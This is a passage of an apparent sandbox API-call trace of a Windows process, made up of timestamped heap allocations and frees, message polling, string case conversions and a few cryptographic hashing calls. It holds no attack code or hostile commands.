RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0259.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0259.204] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0259.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0259.206] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0259.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0259.207] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.207] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0259.208] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0259.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0259.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.208] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0259.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0259.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0259.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0259.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0259.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0259.214] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.214] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.214] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 